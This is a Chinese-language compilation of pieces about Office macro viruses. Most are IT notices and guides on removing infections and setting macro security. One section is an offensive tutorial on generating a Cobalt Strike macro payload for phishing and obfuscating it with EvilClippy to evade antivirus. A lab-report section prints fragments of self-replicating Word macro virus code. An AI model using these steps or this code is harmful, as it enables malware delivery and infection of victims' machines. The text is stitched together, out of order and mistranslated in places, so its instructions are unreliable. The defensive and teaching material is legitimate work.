office 宏病毒处理方法

关于Office文档中宏病毒的处理方法

关于Office文档中宏病毒的处理方法
Office文档是目前使用最多、最常见的办公文档(它包含Word文档，Excel文档，PPT文档等)，由于Office 软件默认的安全级别为中，所以Office文档成了病毒攻击的目标，目前有许多Office文档病毒，最近校园网出现的宏病毒传播，成了大家头疼的一件事，现就处理方法介绍如下，请各老师参考与分享。

1．宏病毒的分析
Office文档中的宏是Office中最高级别的部分，平时大家很少用到，它能把繁重的工作简单化，默认的安全级别为中，宏病毒正是利用这一点通过网络、U盘等进行传播，中毒的电脑明显反应变慢，Office文档大小在不断变化，有的成倍增加，一个小小的电子表格就有2M之多，使用十分困难。

2．感染后的特征
感染后的Office文档，除大小变大外，每次打开都要求启用宏，不启用便不能打开Office文档，或者打开了，全是空白，如果使用杀毒软件，则会把文档删除，给用户带来许多麻烦。

Office软件运行缓慢，电脑经常死机等。

由于现在（QQ、126）邮件系统都集成防毒软件，在发送邮件时上传感染后的Office文档，邮件系统会提示文件发送失败。

3．处理方法
方法一：
点击下载“Office病毒专杀.zip”工具，解压后安装，界面如下:
点击全盘杀毒，即可对电脑中的Office病毒进行全面查杀。

方法二：点击下载安装“新版360杀毒软件.rar”，启动新增Office宏病毒免疫功能。

office宏病毒杀毒方法

宏病毒杀毒方法提醒一台电脑不要装多种杀毒软件，如果有请卸载并只剩下一种，否则会影响电脑速度，安全卫士不算杀毒软件。

方案一：使用最新版360杀毒（推荐）360杀毒下载地址：。

1、实时监控杀毒：当你的桌面存在有Office病毒文件时，360杀毒将会有以下提醒，只需要点击“立即修复”即可查杀掉病毒。

2、手动杀毒：当你觉得某些文件夹或文件需要杀毒时，右键此文件夹或文件，选择“使用360杀毒扫描”。

当然也可以在360杀毒的主界面中，选择快速杀毒、全盘杀毒等。

3、误杀后恢复：在360杀毒的主界面中，点击“查看隔离区”，找到你想恢复的文件恢复即可。

小红伞是国际领先的杀毒工具，打开小红伞杀毒引擎，可以帮助查杀最新的病毒。

方案二：使用新毒霸杀毒新毒霸下载地址：/1、实时监控杀毒：当你运行带有Office病毒的文件时，会出现以下提醒，提醒已经杀除宏病毒，但文件没有打开，需要第二次双击打开。

2、手动杀毒：当你觉得某些文件夹或文件需要杀毒或有病毒一直杀除不掉时，右键此文件夹或文件，选择“使用新毒霸扫描”。

当然也可以在新毒霸的主界面中，选择一键云查杀等。

方案三：使用小红伞杀毒小红伞下载地址：/package/wks_avira13/win32/zhcn/p ecl/avira_free_antivirus_zhcn.exe功能介绍：小红伞能实时提示是否有Office病毒，使用方法类似于前两个软件，但不推荐普及使用，有时比较难处理，这里不做具体介绍。

方案四：使用宏病毒专杀：/thread-22450603-1-1.html当然还有其他方案，推荐使用方案一、二。

由于病毒不断更新，杀毒软件也必须经常更新才能达到保护电脑的目的，请大家提高网络安全意识，学会使用杀毒软件。

提醒一台电脑不要装多种杀毒软件，如果有请卸载并只剩下一种，否则会影响电脑速度，安全卫士不算杀毒软件。

信息化办公室2012年12月20日。

【免费下载】office 宏病毒处理方法

Office文档是目前使用最多也是最常见的办公文档(它包含Word文档，Excel文档，PPT文档等)，以至于Office软件成了大家必备的软件，由于Office软件默认的安全级别为中，所以Office文档成了病毒攻击的目标，目前有许多Office文档病毒，以最近教科局出现的宏病毒为例，成了大家头疼的一件事，现就个人处理方法介绍如下，供大家参考与分享。

1、宏病毒的分析
Office文档中的宏是Office中最高级别的部分，平时大家很少用到，它能把繁重的工作简单化，默认的安全级别为中，宏病毒正是利用这一点通过网络、U盘等进行传播，中毒的电脑明显反应变慢，Office文档大小在不断变化，有的成倍增加，一个小小的电子表格就有2M之多，使用十分困难。

2、中毒后文件的特征
中毒后的Office文档，除大小变大外，每次打开都要求启用宏，不启用便不能打开Office文档，或者打开了，全是空白，如果使用杀毒软件，则会把文档删除，给用户带来许多麻烦。

Office软件运行缓慢，电脑经常死机等。

3、处理方法：
在网上下载“Office病毒专杀”工具（下载地址：http://ww /html/5254.html），解压后安装，界面如下:
点击全盘杀毒，即可对电脑中的Office病毒进行全面查杀。

备注：该软件使用前要关闭其他杀毒软件！。

宏病毒

这样就可选择打开文档时是否要包含宏，如果希望文档包含要用到的宏（例如，单位所用的定货窗体），打开文档时就包含宏。
如果您并不希望在文档中包含宏，或者不了解文档的确切来源。例如，文档是作为电子邮件的附件收到的，或是来自网络或不安全的 Internet节点。在这种情况下，为了防止可能发生的病毒传染，打开文档过程中出现宏警告提示时最好选择“取消宏”。
2．制作、变种方便
以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是以人们容易阅读的源代码宏语言WordBasic形式出现，所以编写和修改宏病毒比以往病毒更容易。世界上的宏病毒原型己有几十种，其变种与日俱增，追究其原因还是Word的开放性所致。现在的Word病毒都是用WordBasic语言所写成，大部分Word病毒宏并没有使用Word提供的Execute-Only处理函数处理，它们仍处于可打开阅读修改状态。所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。当然会有“不法之徒”利用掌握的Basic语句简单知识把其中病毒激活条件和破坏条件加以改变，立即就生产出了一种新的宏病毒，甚至比原病毒的危害更加严重。
起源
宏病毒起源当病毒的先驱者们醉心于他们高超的汇编语言技术和成果时，可能不会想到后继者能以更加简单的手法制造影响力更大的病毒。Word宏病毒就是其中最具有代表性的范例之一。
其实宏病毒的出现并非出乎人们的意料，早在80年代后期就有专家预言过。那时，有些学生就用某些应用程序的宏语言编写病毒。然而，宏病毒与普通病毒不同，它不感染.EXE或.COM文件，而只感染文档文件。宏病毒就像自然界中令人恐惧的龙卷风，对人们正常使用计算机进行学习和工作带来了不可估量的影响，同时也造成了社会财富的巨大浪费。
鉴于绝大多数人都不需要或着不会使用“宏”这个功能，我们可以得出一个相当重要的结论：如果您的OFFICE文档在打开时，系统给出一个宏病毒警告框，那么您应该对这个文档保持高度警惕，它已被感染的几率极大。注意：简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒！

office宏病毒的解决方法

最近公司内宏病毒泛滥，尤其是WORD、EXCEL文件中的宏病毒在公司办公电脑上互相感染，影响了办公效率，给我们的日常办公造成了困扰。

经过测试，现在找到了一个比较有效的远离宏病毒的方法，即“删除OFFICE中的VBA”，操作步骤如下：1、点开始—>控制面板－>打开“添加删除程序“并找到“Microsoftoffice professional Edition2003”2、单击按钮，出现OFFICE安装界面。

3、选择“添加或删除功能”，然后单击“下一步”。

4、在“选择应用程序的高级自定义”前打上勾，并单击“下一步”。

5、选择office共享功能下的“Visual Basic for Applications”项，下拉它前面的三角，选择“不安装”。

此时它的前面就变成了一个红叉号，然后单击“更新”按钮。

7、显示出“Microsoft office 2003已被成功地更新”，单击“确定”8、提示“重新启动计算机后，生效……”，单击按钮“是”,重新启动计算机，Office中的VBA已删除。

9、分别打开WORD、EXCEL，选择菜单栏中的“工具”-->宏-->安全性选择安全级为“非常高”。

可靠发行商下面的“信任所有安装的加载项和模板”、“信任对于Visual Basic 项目的访问”这两项都不要选中。

（备注:第9项有的电脑不需要设置。

）删除了VBA后新建的文件，不会含有宏病毒了，但是原来的文件中有可能含有宏病毒。

原文件的除毒方法：1、打开文件时，如果提示“此工作簿已丢失了其VBA项目……”并且文件的标题上方显示着“只读”2、点文件“另存为”3、再打开另存后的文件，文件就不含有宏病毒代码了，打开的时候也不会再出此“此工作薄已丢失了其VBA项目”、“此工作薄中含有宏病毒的提示了。

”注：近期有几台电脑，需要关闭360安全卫士才可以正常使用OA，我们与360产品研发部反馈后，360产品研发部已将360安全卫士已进行了升级。

清除宏病毒方法

清除宏病毒方法一、验证是否感染了宏病毒？打开需要检查的文档，单击“文件”菜单栏，选择“另存为”命令，如果对话框中的保存类型固定为“文档模板”，则表示这个文件已经感染了宏病毒。

二、清除宏病毒的方法1、 OFFICE2003方法：打开文档，工具――宏――宏（或者使用组合键“Alt＋F8”,如OFFICE版本不同找不到选项，可以使用此组合键）调出宏对话框，如果在弹出的对话框中有已经记录的宏的话，那就极有可能是宏病毒，删除所有的宏就可以了。

比较复杂的宏病毒会将宏对话框屏蔽掉，这时就需要采用其他方法了。

Word 环境中的宏病毒一般是存放在Microsoft Office目录下Templates子目录中的Normal.dot文件中，这时需要重新启动计算机，找到这个文件，并把它删除，再运行Word就可以了。

但是有些宏病毒“知道”用户会找到No rmal.dot 并删除掉，所以它会在硬盘的多个目录中放上同样的No rmal.dot，如果只删除Templates下的一个，Word会按照Windows缺省的搜索路径进行搜索，这样会加载其他有毒的Normal.dot，并把删除掉的再重新恢复这时，只要使用Windows中查找文件的方法把硬盘中所有的Normal.dot全部删除就可以了。

2、设置宏安全性。

Office2003方法，打开文档－工具－选项－安全性－宏安全性－安全级。

Office20010方法，打开文档－文件－选项－信任中心－信任中心设置－宏设置－禁用所有宏，并且不通知。

3、使用宏病毒专杀工具全盘查杀。

可到/html/5254.html下载专杀工具。

安装“宏病毒专杀工具”，按照步骤一步步安装即可，安装完成后，进行全盘扫描查杀。

宏病毒深入分析

宏病毒的深入分析OFFICE给用户提供了用于创建专业而优雅的文档,表格等工具，帮助用户节省时间，并得到优雅美观的结果，在当前使用中是占有巨大优势的文字，数据处理器。

它为我们的办公提供了极大的便利.OFFICE为了方便客户，提供了宏这样一个功能。

宏就是能组织到一起作为一独立的命令使用的一系列命令，它能使日常工作变得更容易，一般说来，宏是一种规则或模式，或称语法替换，用于说明某一特定输入（通常是字符串）如何根据预定义的规则转换成对应的输出（通常也是字符串)。

这种替换在预编译时进行，称作宏展开。

通俗的来说，客户事先设置好宏，需要时就可以批量使用，而不必重复操作。

然而宏也是一把双刃剑，它在让客户享受便利的同时，同时也为黑客留下了漏洞，这就是今天要分析的宏病毒。

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

word宏病毒通过．DOC文档及．DOT模板进行自我复制及传播，而计算机文档是交流最广的文件类型。

多年来，人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染，而对外来的文档文件基本是直接浏览使用，这给Word 宏病毒传播带来很多便利。

特别是Intemet网络的普及．Email的大量应用更为Word 宏病毒传播铺平道路。

根据国外保守的统计，宏病毒的感染率高达40％以上，即在现实生活中每发现100个病毒，其中就40多个宏病毒，而目前国际上普通病毒种类已达12000多种。

宏病毒的产生，是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。

这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘，病毒可以把特定的宏命令代码附加在指定文件上，通过文件的打开或关闭来获取控制权，实现宏命令在不同文件之间的共享和传递，从而在未经使用者许可的情况下获取控制权，达到传染目的。

宏病毒处理方法

宏病毒处理方法各位领导及同事：近期各部门office软件都发现宏病毒，宏病毒会自动更改execl文件的安全性(将之自动调为低)并在发作后毁坏感染的office文件，严重影响大家的日常工作。

现将处理方法简单介绍如下（该处理办法主要针对office2021）：一：随本文件一起装箱存有“金山毒霸宏病毒暴横工具”，双击“金山毒霸宏病毒暴横工具”自动展开加装，加装后界面如下:点击全盘杀毒，即可对电脑中的office病毒进行全面查杀。

（如果计算机上装有wps，金山毒霸宏病毒专杀则不能查杀）二：1、随本文件一起装箱存有最新360安装文件，双击“新版360杀毒软件”展开加装（特别注意：在加装360安装包前需将电脑以前加装过的杀毒软件装载，装载后重新启动电脑再加装最新版360），新版360在病毒免疫系统中启动追加office宏病毒免疫系统功能。

2、在杀毒软件右上角，打开设置，并按照下图设置杀毒软件参数，进行设置：3、在设置中关上“病毒读取设置”，其中“须要读取文件类型”选上“读取所有文件、步入压缩包柯亭”。

4、设置好后，更新杀毒软件，如下图，点击软件右上角“升级”，在打开的界面中进行自动升级。

在反复确认升级完成后，再选择“全盘扫描”，然后查毒。

三：杀毒回去宏病毒后关上excel表格文件设置，将宏的安全性设置为低“工具——宏——安全性”如果宏的安全性无法设置为低，则须要对该文件页面右键，单独展开一次360杀毒和“金山毒霸宏病毒专杀工具”杀毒，再将“宏”安全性如下图调到“中”，文件打开后若出现“禁用宏”或“启用宏”选项，则选择“启用宏”。

（文件只需进行一次查杀即可）期望各部门严苛按照上述方法对公司办公电脑及个人电脑展开office宏病毒杀毒。

海螺其他兄弟公司也存有宏病毒发生，恳请大家在拒绝接受邮件及采用移动存储设备之前先采用上述两个软件展开杀毒后再关上，以免发生重复病毒感染。

Cobalt-StrikeOffice宏利用与免杀

Cobalt-StrikeOffice宏利⽤与免杀1.打开Cobalt-Strike⽣产Office宏病毒。

⾸先需要设置监听器、因为钓鱼的⽬标⽐较单纯，在这⾥就不采⽤域前置技术。

然后使⽤攻击模块，⽣产Office宏病毒。

设置好监听器。

⽣成宏病毒2.将宏病毒放⼊word⾸先打开Word，在审阅中编辑宏：创建新的宏：将⽣成的宏病毒放⼊Microsoft Word⽬录下的ThisDocument，注意如果宏位置写错了很容易报错。

按下Ctrl+S，将⽂件保存为启⽤宏的Word⽂档，注意这⾥的作者需要修改，否则默认会使⽤账户名此时带宏病毒的Word⽂件已经⽣成，但是会发现过不了杀软，需要进⾏免杀。

此时需要⼀款⽐较知名的免杀软件：EvilClippy最新版本的：软件需要编译运⾏，由于本⼈使⽤的是Linux环境进⾏免杀，所以命令如下：⾸先需要有mono环境：sudo apt-key adv --keyserver --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EFecho "deb wheezy main" | sudo tee /etc/apt/sources.list.d/mono-xamarin.listsudo apt-get updatesudo apt-get install mono-completesudo apt-get install monodevelop然后使⽤mono,进⾏编译：mcs /reference:OpenMcdf.dll, /out:EvilClippy.exe *.cs检查免杀软件是否可以正常运⾏：mono EvilClippy.exe -h然后进⾏免杀操作：⾸先需要创建⼀个vba⽂件，后续需要进⾏混淆，vba内容如下Sub Hello()Dim XX=MsgBox("Hello VBS")#先使⽤⼀个模块来设置随机模块名，混淆了⼀些分析⼯具，会⽣成⼀个以_EvilClippy.docm结尾的⽂件。

word和EXCEL宏病毒处理方法

...打不开症状：双击运行时，打不开，弹出窗口提示：“ 遇到问题需要关闭.我们对此引起地不便表示抱歉.”有两个选择“发送错误报告”和“不发送”.如果选择“不发送”，程序将自动关闭，然后再次运行，而且会询问“是否以安全模式启动”？如果选择“是”，将进入“安全模式”.在这种模式下，将仅显示空白窗口，需要再手动打开文档方可显示.如果选择“否”，又将弹出这种对话框，不断地循环.【解决办法一】第一步：此文件一般默认在系统盘，也就是盘.文件夹是隐藏地，所以我们必须先“显示隐藏文件”.双击打开“我地电脑”，单击“菜单栏”地“工具”>“文件夹选项”>查看，将“隐藏受保护地操作系统文件（推荐）”前面地勾取消，然后将“显示隐藏地文件、文件夹和驱动器”勾上，确定.个人收集整理勿做商业用途第二部：打开路径：:\ \\ \\ ，你会看见两个文件，将“”删除掉.个人收集整理勿做商业用途最后重新打开看看，是不是可以正常启动了.【解决办法二】操作一：在弹出地“是否以安全模式启动”时，选择“是”；操作二：进入后，选择“菜单栏”地“文件”>新建；操作三：然后在右边地“新建文档”处点击“本机上地模板”操作四：删除“空白模板”，确定.重新运行，就可以恢复正常了.宏病毒（病毒）处理方法症状：第一次打开带病毒地文档时，会提示“是否启用宏”对话框，以后每次打开文档时就会自动弹出一个文档.个人收集整理勿做商业用途传播途径：主要以发送邮件或使用盘时，接收了带病毒地文档.处理步骤：、首先进行病毒查杀：使用病毒专杀软件、瑞星杀毒软件、杀毒软件查杀（有些病毒可能查杀不到）.个人收集整理勿做商业用途、然后将病毒源删除：在:\ \ \\\下，然后将文件删除.个人收集整理勿做商业用途查毒方式：主要有病毒专杀软件、瑞星杀毒软件、杀毒软件等....。

OFFICE宏病毒导致OBA财务报表取数异常-U9服务支持系统

OFFICE宏病毒导致OBA财务报表取数异常某项目反馈2.5版本OBA财务报表取数异常，打完补丁后，取不出来数据了，经过排查，发现不是补丁原因导致，而是因为客户电脑上，中了OFFICE宏病毒（K4），导致OBA无法调用取数函数服务，所以取不出来数据，由于该病毒是近2个月才出现，且比较容易传播，可能会有多个项目会遇到，如有项目提出OBA财务报表取法取到数据，可按如下办法检查；检查办法：1、打开EXCEL，从开始菜单中，点开EXCEL选项；2、EXCEL选项画面，点击信任中心页签中的信任中心设置3、在信任中心设置画面，找到受信任位置中的用户启用路径，复制该路径4、在运行中，录入该路径，会弹出该路径的文件夹，该文件夹下应该有名称为UFIDA_ExcelFunc.xla的文件，如果没有，则OBA财务函数肯定取不到数据，再检查该画面是否有名称为K4的文件，如果有，则说明中了K4宏病毒，如果还有其他的文件，可以上网查询下是否是病毒；解决办法：临时解决办法：删除K4文件后，OBA财务报表就可以正常取数；针对该病毒，网上可以找到杀毒办法，请按照网上的说明进行杀毒；定位OBA报表取数问题的方法以上说明只针对K4病毒导致OBA财务报表无法取数的检查办法；针对OBA财务报表取数出现问题，可以按以下办法先定位原因：问题一：OBA财务取数函数可以取到数据，但是数据错误，1、请先检查取数函数是否设置正确；2、如果设置无误，则可能是产品bug，请联系支持部或研发解决；问题二：OBA财务取数函数取不到数据注意：0也表示取到了取数，只是余额为0或发生额为0，当显示#value或#name时，表示取不到数据；当显示为#name时，是因为宏被禁用了，可按如下方式检查：在excel的开始菜单中，打开Excel选项，在加载项中，检查禁用项目中，是否有U9相关项目，如有被警用的，则需启用，重新打开Excel后再执行取数；当显示为#value时，可按如下方式检查：1、portal端，使用常用凭证模版中的公式凭证，原币金额公式，设置财务函数取值，再生成凭证，如能正常生成凭证，且金额有值，说明财务取数函数没有问题，基本可定位为OBA客户端的问题；2、OBA客户端问题，分为产品中OBA客户端bug、中了OFFICE病毒，可能还有其他原因；是否有病毒，可按上面的方式先检查，或下载专门的病毒检查工具，如果没有病毒，则提交问题由支持部或研发检查；注：由于非OBA开发人员，本文档中所述，是基于目前我所知情况下的自查及解决办法，希望能对项目有所帮助；一定还会遇到其他的原因，需要各位遇到问题后记录原因及解决办法，并分享；。

EXCEL中BOOK1宏病毒清除处理方法

EXCEL中BOOK1宏病毒清除处理方法如果你打开XLS文件时提示该文件含有宏，不运行宏则无法看到表格内容，运行宏后，屏幕伴随闪动一下，同时会产生一个BOOK1的工作薄，那么，可以确定，你的office2003中了BOOK1宏病毒。

该病毒看似无恶意，但是烦人，之后使用过的XLS文件都将被感染。

虽然该毒不是新毒，但目前部分杀毒软件都不识别。

手工处理方法：1、阻断病毒交差感染。

如果你的office2003装在C盘。

将下面的DOS代码复制到记事本中，另存为“防止感染C.bat”。

双击“防止感染C.bat”，office装在D盘，则将下面的代码中“C:”改为“D:”。

该操作可在X:\Program F iles\Microsoft Office\OFFICE11\XLSTART下生成BOOK1特殊文件（普通方法无法删除），防止该病毒建立book1病毒文件。

如果\XLSTART存在book1（155KB）在启动EXCEL时，就会同时打开该病毒文件，所以感染你打开的XLS文件。

cd\C:cd\cd C:\Program Files\Microsoft Office\OFFICE11rd /s/q XLSTARTmd XLSTARTcd XLSTARTmd book1..\md book1md abc...\md book1\abc...\2、使用软件杀毒。

1、安装“BOOK1宏病毒超专杀.exe”（该软件必须关闭你所装的杀毒软件方可运行 /jjk下载），并对你的XLS文件进行扫描清除宏毒。

该软件不理想的是打开已清除病毒的XLS始终会有禁止宏的提示。

3、手工清毒。

打开带宏毒的XLS文件，并启用宏。

点菜单：格式，工作表，取消隐藏。

确定。

此时，会出现“00000ppy”工作表，点菜单工具，保护，撤消工作表保护，密码为“VicodinES”。

然后，对着“00000ppy”表标签右击，删除。

保存。

4、以上2，3两步可以去除病毒，但仍提示含宏或其它提示。

office提示宏病毒解决方案

宏病毒进入电脑说明你的宏的安全性设置为低，要把它改为高才可以：
搜索第一步：就是在工具里面的宏安全性里面设置成“高”。
第二步：要是不行就打开注册表，具体方法如下
1、在“开始”里找到“运行”按纽，点击后在“打开”栏里输入“regedit”，就可以打开注册表了；
2、找到HKEY_LOCAL_MACHINE打开,找SOFTWARE打开,找Microsoft打开,找office打开,找12.0打开,找EXCEL打开,找security打开，双击LEVEL，在跳出的编辑DWORD值里面看到数值数据（V）：在下面的空格里面修改数值就可以了。
பைடு நூலகம்
注意：1为低，2为中，3为高
。
设置结束后就可以关闭了。如果你还想要打开带宏的文件，那就再将宏设置为“中”，打开文件按提示启用宏就可以了，但是用完之后记得要再改为“高”，不然很容易中宏病毒的。

Office办公软件中的宏与宏病毒

Office办公软件中的宏与宏病毒Office办公软件中的宏与宏病毒现在所有企业用的最多的办公软件就是Office，它包含的范围非常广泛，做表格可以用Excel，打材料报告或文章可以用Word，如果数据比较多那就用Access数据库，如果开会或演示的话就可以用到PowerPoint，这些软件大大方便了人们的生活和使用。

但是随着计算机的大量使用，很多病毒都会乘虚而入。

宏病毒就是其中一种。

一、宏病毒的定义宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

所谓“宏”可以理解为一些命令的集合，类似于DOS下的批处理文件，它能给文件的编辑带来许多方便。

宏病毒编制极其容易，微软的宏语言都是BASIC语言的子集。

宏病毒利用宏语言外部的例程的调用能力如使用WindowsAPI函数，能进行任何操作。

一句话只要有应用程序支持解释，宏病毒无需改动即可在许多平台上运行。

二、宏病毒的分析Office文档中的宏是Office中最高级别的部分，平时大家很少用到，它能把繁重的工作简单化，其在电脑中默认的安全级别为中，宏病毒正是利用这一点通过网络、u盘等进行传播，中毒的电脑明显反应变慢，Office文档大小在不断变化，有的成倍增加，一个小小的电子表格就有2M之多，对于操作者使用十分困难。

三、宏病毒感染后的特征“宏病毒”能在文件间复制自身的恶意宏程序，一般可以损坏或更改数据。

一旦打开沾染病毒的文档，其中的宏就会被执行，宏病毒会被激活，转移到计算机上，并驻留在Normal模板上。

此后，所有自动保存的文档都会“感染”上这种宏病毒，感染后的Office文档，除大小变大外，每次打开都要求启用宏，不启用便不能打开Office文档，或者打开了，全是空白，如果使用杀毒软件，则会把文档删除，造成文件丢失，给用户带来许多麻烦。

Office软件运行缓慢，电脑经常死机等。

由于现在(QQ、126)邮件系统都集成防毒软件，在发送邮件时上传感染后的Office文档，邮件系统会提示文件发送失败。

OFFICE宏病毒查杀方案

OFFICE宏病毒查杀方案OFFICE宏病毒查杀方案彻底查杀本次OFFICE宏病毒，需通过以下步骤解决。

一、清除用户电脑上存在的病毒。

（4月16日11：30-13：00进行）二、安装或升级防毒软件，避免再次感染。

（4月16日11：30-13：00进行）具体说明如下：一、清除用户电脑上存在的病毒。

1、使用专杀工具“MacroKiller”进行杀毒。

图1MacroKiller专杀工具2、使用“Cleanmacro”office病毒专杀工具，进行杀毒。

图2“Cleanmacro”office病毒专杀第一文库网工具二、安装或升级防毒软件，避免再次感染。

1、安装ESETNOD32Antivirus4杀毒软件或者免费的360杀毒软件，注意2种杀毒软件不可以安装在同一台电脑。

2、建议已经安装ESETNOD32的用户先升级软件和病毒库，再进行查杀。

（具体操作如下图3、4、5）3、建议已经安装360的用户先升级软件和病毒，再进行查杀。

（具体操作如下图6、7、8、9）4、完成以上步骤以后，即可拥有对本次OFFICE宏病毒的防御能力。

5、培养良好的计算机使用习惯，防止病毒感染。

建议用户接收到文件后，先使用杀毒软件对文件进行查杀后再打开接收到的文件，尽量避免直接打开接收到的'文件，减少病毒感染的机率。

例1、通过OA打开文件时，建议先另存，再杀毒，然后再打开。

例2、通过RTX或其他即时通讯软件接收到的文件或程序，先另存再杀毒，然后再打开或运行；培养定期对电脑进行全盘杀毒的习惯，防止感染病毒。

图3ESETNOD32Antivirus4杀毒软件图4升级到4.2.71.2以上版本可以查杀本次OFFICE宏病毒图5ESETNOD32发现病毒后会自动隔离病毒文件，达到防御的目的。

如必须查看该文档请对方先通过专杀工具查杀后再发送。

图6360杀毒软件需升级到3.0.0.3031以上版本图7设置360杀毒软件的“实时防护设置”图8手动杀毒，鼠标单击右键选择相应的杀毒软件手动查杀病毒。

计算机宏病毒分析及清除试验报告

Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'Micro-Virus" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 2, "Sub Document_Close()"
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
实验报告
实验时间
2016年11月23日
实验地点
软件工程实验室
实验名称
计算机宏病毒分析及清除
实验目的：1、了解“宏病毒”机理；
2、掌握清除宏病毒的方法；
3、掌握采用“宏”和脚本语言进行编程的技术。
实验平台：1、Windows 2000/2003/XP或更高级别的Windows操作系统；
2、Office Word 2000/2003等字处理软件。

Excel宏病毒的应对方法

Excel宏病毒的应对方法
电脑中了Excel宏病毒，很多Excel文档无法打开或无法正常找开，上网查询后下载专杀毒软件杀毒后发现宏病毒已经清除，重启后病毒还在。

经过试验处理了几台中毒的电脑，总结方法如下以供参考。

1、最简单的方法
第一步进入删除Office 应用程序控制面板---添加或删除程序
----Microsoft Office Professional Edition 2003—----删除
第二步安装Office软件下载简化版或完全版安装到电脑中即可
第三步关闭网络拔掉网络线或进入“网上领居”属性----“本地连接”----停用
第四步打开中毒的Excel文件在弹出对话框中选择“禁用宏”，然后全选内容-----复制，新建文件----粘贴（刚才所复制的内容）-----保存文件。

第五步重复第四步完成所有打不开的Excel文件的处理工作
第六步重开网络插入网络线或进入“网上领居”属性----“本地连接”----启用
完成
2、重装系统方法安装好系统和office 软件，执行第一种方法中的第二步至第六步即可
所有的事后处理都是亡羊补牢，我们应该平时养成防范意识，安装杀毒软件并经常更新和检查磁盘，对来历不明的U盘和光碟要慎用，特别不要关闭防火墙等杀毒软件给病毒入侵有可乘之机，让自己的电脑安全正常工作。

Excel宏病毒处理方法

Excel宏病毒处理方法近期公司局域网部分电脑感染EXCEL宏病毒，且有蔓延趋势，结合前段时间杀毒软件的使用情况，整理如下杀毒步骤。

一、中病毒症状：1、无法更改宏的安全性，每次将宏的安全性调到时，却在运行宏的时侯，EXCEL 文件的安全性又变成高。

2、Mirosoft office excel遇到问题需要重启,我们对此引起的不便表示抱歉.你正在处理的信息可能丢失, Mirosoft office excel以尝试为你修复.恢复我的工作并重启.请将此问题报告给Mirosoft我们已创建了一个错误报告,你可以将其发送给我们帮助我们改善Mirosoft的质量, 发送: 不发送。

处理方法：首先按照下面的说明步骤进行杀毒。

然后运行以下步骤进行操作：（1）、关闭所有打开的Word EXCLE 文档；（2）、复制这条命令：%APPDATA%\Microsoft\excel\XLSTART（3）、开始→运行→粘贴上面复制的命令→确定（4）、在打开的目录下，找到并删除Normal.dot，然后重新运行Word即可。

（5）、看里面有没有xls文件,有的话,删除掉3、打开EXCEL文档时，会自动弹出一个或多个EXCEL数据文档。

4、打开EXCEL文档时，原来的多个EXCEL数据表，在打开EXCEL表格会自动删除。

5、EXCEL表无法运行宏。

首先查看该文件中是否有宏存在。

查看方法：工具菜单->宏命令->宏，如下图：文件中无宏文件中无宏6、如果打开EXCEL文件看不到内容，同时确定该文件没有病毒的情况下，将宏的安全性降低，就可以将内容显示出来。

二、OFFICE专杀工具安装及查杀步骤。

1、下载安装文件在办公网实用工具-> 常用软件->病毒查杀->OFFICE专杀下进行下载。

2、对该文件进行解压，并双击setup文件。

3、出现如下图，并单击“Next”3、出现如下图，选择“I accept the agreement”, 并单击“Next”4、出现如下图，选择安装路径（此处不用更改），并单击“Next”5、出现如下图，按照默认方案在桌面建立图标和在快速启动栏建立图标，并单击“Next”6、出现如下图，选择“Install”7、出现如下图，选择“Finish”,安装完成。

宏病毒专杀(CleanMacro)介绍

大家好，宏病毒专杀（CleanMacro）是毒霸资深反病毒工程师boom的业余作品，有需要的朋友可以下载使用~本专杀用于解决Book1、Startup、Results、Poppy、CopyMod、Blackice、Yugall等Office常见宏病毒。

宏病毒杀不了怎么办，用宏病毒专杀，特别说明:1、7.10版本开始和以前版本不兼容，使用新版本时，请先删除老版本。

2、7.11版本解决上一个版本被杀软误报的问题，请更新下新版本。

3、10.11版本开始支持了autocad病毒查杀，在查毒前请关闭autocad主程序。

2012.5.10:1、解决office 2007录制个人宏时误报的问题。

2、增加清除宏病毒时常见问题和问题解决方案。

3、改进没有office的用户交互。

4、更新专杀启动logo。

5、增加新版本特性提示。

setup.rar(0 Bytes, 下载次数: 2336361)2012.5.2:1、解决snake病毒模板清除失败的问题。

2012.4.18:1、解决其它杀毒软件清除残留的问题。

2012.4.16:1、解决Poppy病毒清除残留的问题。

2012.4.13:1、新增Excel.SpecsJoker.a病毒的查杀。

2、解决扫描时卡住的问题。

2012.4.10:1、解决Lorux病毒变种清除失败的问题。

2、解决ToDole病毒残留的清除问题。

2012.3.06:1、去除ms自带插件提示有宏的提示。

2、恢复专杀对office 2010的支持。

3、解决在office 2003下提示有宏的问题。

2012.3.03:1、解决Lourx病毒残留不能清除的问题。

2、解决office 2010运行后自动退出的问题。

更新日志：2012.3.01:1、新增ToDole病毒的查杀。

2、解决部分情况下"全盘扫描"不扫描u盘的问题。

2012.2.24:1、新增Xl4poppy新变种的查杀。

2012.2.23:1、解决专杀在win7下权限问题，导致运行出错的问题。

关于A6协同中感染OFFICE宏病毒问题解决方案

关于宏病毒问题解决方案
问题：客户端文档存在宏病毒，上传协同办公系统后，单位其他人员下载传染宏病毒。

但在服务器本地无法查出文档有病毒，因此通过协同办公系统引发病毒传播。

原因：客户端本地文档有病毒，没有通过杀毒软件查出，上传协同系统后由于文件被加密，服务器杀毒软件对加密文件无法查杀病毒，这样导致其他人下载时病毒传播。

解决方案：
1、加强客户端杀毒软件实时更新，从根源上查杀病毒。

目前360杀毒
软件6月11日之后版本支持宏病毒查杀。

